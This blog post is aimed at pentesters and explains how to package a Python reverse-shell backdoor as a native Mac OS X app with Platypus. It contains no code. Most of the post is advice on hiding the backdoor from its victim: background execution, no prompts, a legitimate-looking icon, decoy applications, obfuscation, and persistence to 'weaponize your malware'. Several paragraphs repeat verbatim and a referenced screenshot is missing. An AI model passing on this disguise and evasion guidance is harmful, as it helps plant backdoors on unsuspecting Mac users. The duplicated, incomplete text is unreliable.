Native Mac OS X Application / Mach-O Backdoors for Pentesters
Back in the day, Dave Kennedy made a great post, in which he released a script called PyBuild and simple python reverse shell that enabled pentesters to write shells and / or malware in python then compile it down to a native executable / PE for windows systems. This is really useful for a number of reasons, namely having a simple executable and bypassing antivirus. Today I'm going to demonstrate the same technique on OS X, building a python backdoor down to a native application bundle.
To start, I've been writing my own custom pieces with this method, but for today we are going to use an updated python shell written by Dave Kennedy. That zip files comes with server.py, shell.py, and shell.exe. What we will be doing today is building shell.py down to an application bundle, which will allow use to use it just like we would shell.exe, only on Mac OS X systems. This can be done via the command line using he main tool pyinstaller, but we will be using Platypus for ease of use. Simply configure the program like so below:
Enjoy, and leave your thoughts or tips in the comments!
To start, I've been writing my own custom pieces with this method, but for today we are going to use an updated python shell written by Dave Kennedy. That zip files comes with server.py, shell.py, and shell.exe. What we will be doing today is building shell.py down to an application bundle, which will allow use to use it just like we would shell.exe, only on Mac OS X systems. This can be done via the command line using he main tool pyinstaller, but we will be using Platypus for ease of use. Simply configure the program like so below:
Now, you can either double click the app to launch the backdoor, or you can step into the app package and directly call the mach-o executable. Either way the app will execute, your python script will run, and you will get a callback. Leave the "Output" set to "None", this will suppress any prompts when run. Without the "Run in background" option flagged, the program will launch an app in the dock tray, so check "Run in background". Regardless, picking a legitimate .icns file helps to not alert the user, although if your trying to keep the size down you can skip the image. Further along those lines, it may help to launch a seemingly legitimate application or notice if the application is run. Without the "Secure bundled script" option flagged, a copy of the script will be kept in the application bundle, under the resources directory, and is verbatim the script you've built into an executable, so check "Secure bundled script". It also helps to obfuscate your script and/or take efforts to hide the backdoor, as this is pretty easy to reverse by default.
Finally, you can use many of the techniques we've covered in the Mac OS X Live Forensics series to hide, persist, and further weaponize your malware, simply using them as an attacker rather than a forensics analyst. To get a good idea of the tricks a red teamer could pull with python on a Mac and for more inspiration for your malware, check out Josh "FuzzyNops" talk at DerbyCon:
Finally, you can use many of the techniques we've covered in the Mac OS X Live Forensics series to hide, persist, and further weaponize your malware, simply using them as an attacker rather than a forensics analyst. To get a good idea of the tricks a red teamer could pull with python on a Mac and for more inspiration for your malware, check out Josh "FuzzyNops" talk at DerbyCon:
Enjoy, and leave your thoughts or tips in the comments!
